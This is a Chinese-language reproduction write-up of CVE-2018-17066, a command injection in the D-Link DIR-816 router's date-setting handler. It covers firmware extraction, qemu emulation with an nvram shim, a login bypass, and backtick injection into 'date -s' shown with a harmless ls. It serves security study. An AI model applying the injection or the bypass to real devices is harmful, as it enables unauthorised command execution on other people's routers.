CVE-2018-17066漏洞概述:在该路由的前端页面中存在时间设置页面,但是我们手动输入的时间并没有被过滤,就会直接将数据传输到后端处理,经过一段函数调用后会将参数传入system作为参数从而实现命令注入!(任意命令执行)
doSystem("date -s \"%s\"", Var);
会直接将传入的参数作为system的参数-》从而实现命令注入!一
D-Link固件提取
U-Boot: OS Kernel Image("Linux Kernel Image")[Linux,MIPS,lzma]
~/Pwn_CVE/CVE-2018-17066$ binwalk -Me DIR-816.img DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
4280396 0x41504C Linux kernel version 2.6.36
4280496 0x4150B0 CRC32 polynomial table, little endian
4327552 0x420880 CRC32 polynomial table, little endian
4348800 0x425B80 SHA256 hash constants, little endian
4350160 0x4260D0 AES Inverse S-Box
4350928 0x4263D0 AES S-Box
4642928 0x46D870 xz compressed data
4675640 0x475838 Unix path: /var/run/goahead.pid
4764032 0x48B180 Unix path: /etc/Wireless/RT2860AP/RT2860AP.dat
4789596 0x49155C XML document, version: "1.0"
4819148 0x4988CC HTML document header
4819285 0x498955 HTML document footer
4839035 0x49D67B Neighborly text, "neighbor %.2x%.2x.%pM lostd_delay_timer"
5018336 0x4C92E0 CRC32 polynomial table, little endian
5021872 0x4CA0B0 AES S-Box
二
D-Link路由模拟执行
brinmon@brinmon-virtual-machine:
~/Pwn_CVE/CVE-2018-17066/_DIR-816.img.extracted/squashfs-root$ file ./bin/goahead
./bin/goahead: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
1. **动态版本 (`qemu-mipsel`)**:适合在有所有必要共享库的系统上使用,可以节省磁盘空间。
注:通过-L设置根目录
sudo qemu-mipsel -L ./ ./bin/goahead2.- **静态版本 (`qemu-mipsel-static`)**:由于不依赖外部库,它更便于分发和在各种环境中运行。
注:chroot . 设置根目录
cp $(which qemu-mipsel-static) ./
sudo chroot . ./qemu-mipsel-static ./bin/goahead
注:删除文件夹:rm -rf ./var/run mkdir ./var/run
touch ./var/run/goahead.pid
li $s3, dword_480000 # 定位字符串的基址1
li $s2, aEttimeoutDocum # 定位字符串的基址2
...
loc_45C72C: # CODE XREF: setDefault+98↓j
la $t9, fopen # 传入要调用的函数fopen地址
addiu $a0, $s3, -0x3124 # 定位字符串"/var/run/nvramd.pid"
jalr $t9 ; fopen # 调用fopen函数
addiu $a1, $s2, 0x4CDC # 根据偏移发现地址474CDC,是一个单词的字母"r"
touch ./var/run/nvramd.pid
知识的拓展:
在Linux操作系统中,硬件设备也被看做文件来处理,/dev/nvram是非易失性存储器nvram设备_(具体概念在5.3.2章节进行介绍)_。`/dev/nvram` 提供了一种方便的方式来访问和管理系统的非易失性存储器,可以用于存储系统配置、启动参数和硬件设置等重要信息,是其他硬件用来存储信息的地方
// Mount point of the base NVRAM implementation.
#define MOUNT_POINT "/mnt/libnvram/"
// Location of NVRAM override values that are copied into the base NVRAM implementation.
#define OVERRIDE_POINT "/mnt/libnvram.override/"
ENTRY("lan_ipaddr", nvram_set, "192.168.126.130") \
ENTRY("lan_bipaddr", nvram_set, "192.168.126.255") \
mipsel-linux-gnu-gcc -c -O2 -fPIC -Wall nvram.c -o nvram.o
mipsel-linux-gnu-gcc -shared -nostdlib nvram.o -o libnvram.so
┌──(root㉿kali)-[/home/…/Pwn_CVE/CVE-2018-17066/_DIR-816A2_FWv1.10CNB05_R1B011D88210.img.extracted/squashfs-root]
└─# chroot . ./qemu-mipsel-static -E LD_PRELOAD="./libnvram.so" ./bin/goahead
┌──(root㉿kali)-[/home/…/Pwn_CVE/CVE-2018-17066/_DIR-816A2_FWv1.10CNB05_R1B011D88210.img.extracted/squashfs-root]
└─# chroot . ./qemu-mipsel-static -g 23946 ./bin/goahead
http://192.168.126.131/dir_login.asp/
三
开始寻找存在漏洞的页面
/home/kali/Pwn_CVE/CVE-2018-17066/_DIR-816A2_FWv1.10CNB05_R1B011D88210.img.extracted/squashfs-root/etc_ro/web/dir_login.asp
function onlogin() {
/*
if (document.test.show_username.value.length <= 0) {
alert("请输入用户名!");
document.test.show_username.focus();
return false;
}
if (document.test.show_username.value != "")
{
document.test.username.value = Base64.Encode(document.test.show_username.value);
}
if ( document.test.password.value != "")
{
document.test.password.value = Base64.Encode(document.test.password.value);
}
document.test.show_username.disabled = true;
*/
return true;
}
四
成功绕过登录验证
http://192.168.126.131/d_wizard_step1_start.asp
ls
写入date数据段,实现命令注入成功!五
最后总结分析
反引号 (``) 或 $() 形式
$()
形式,因为它更易读且支持嵌套。┌──(kali㉿kali)-[~/tools/BurpSuite V2024.3.1.2]
└─$ date -s "`ls`2024-6-05 01:58:39"
date: 无效的日期 "清除许可证和数据.bat\n使用说明.txt\nBurpSuite\nCNBurp(无CMD窗口).VBS\nCN-JRE Burp.bat\nENBurp(无CMD窗口).VBS\nEN-JRE Burp.bat\njre\nLinux\nStart.bat\nStart.VBS2024-6-05 01:58:39"┌──(kali㉿kali)-[~/tools/BurpSuite V2024.3.1.2]
└─$ "`ls`"
清除许可证和数据.bat
使用说明.txt
BurpSuite
CNBurp(无CMD窗口).VBS
CN-JRE Burp.bat
ENBurp(无CMD窗口).VBS
EN-JRE Burp.bat
jre
Linux
Start.bat
Start.VBS:未找到命令
doSystem("date -s \"%s\"", Var);
会直接将传入的参数作为system的参数-》从而实现命令注入!借鉴复现笔记:
1.cve-2018-17066复现 | 1uckyc's blog
(https://1uckyc.github.io/2023/11/24/cve-2018-17066%E5%A4%8D%E7%8E%B0/)
2.DIR-816 模拟执行与命令注入漏洞分析 - IOTsec-Zone
(https://www.iotsec-zone.com/article/213)
3.VulInfo/D-Link/DIR-816/cmd_injection_0/README.md at master · PAGalaxyLab/VulInfo (github.com)
(https://github.com/PAGalaxyLab/VulInfo/blob/master/D-Link/DIR-816/cmd_injection_0/README.md)
4.物联网终端安全入门与实践之玩转物联网固件(中) - SecPulse.COM | 安全脉搏
(https://www.secpulse.com/archives/188250.html)
5.Debugging D-Link: Emulating firmware and hacking hardware (greynoise.io)
看雪ID:Loserme
https://bbs.kanxue.com/user-home-970470.htm
# 往期推荐
2、BFS Ekoparty 2022 Linux Kernel Exploitation Challenge
3、银狐样本分析
球分享
球点赞
球在看
点击阅读原文查看更多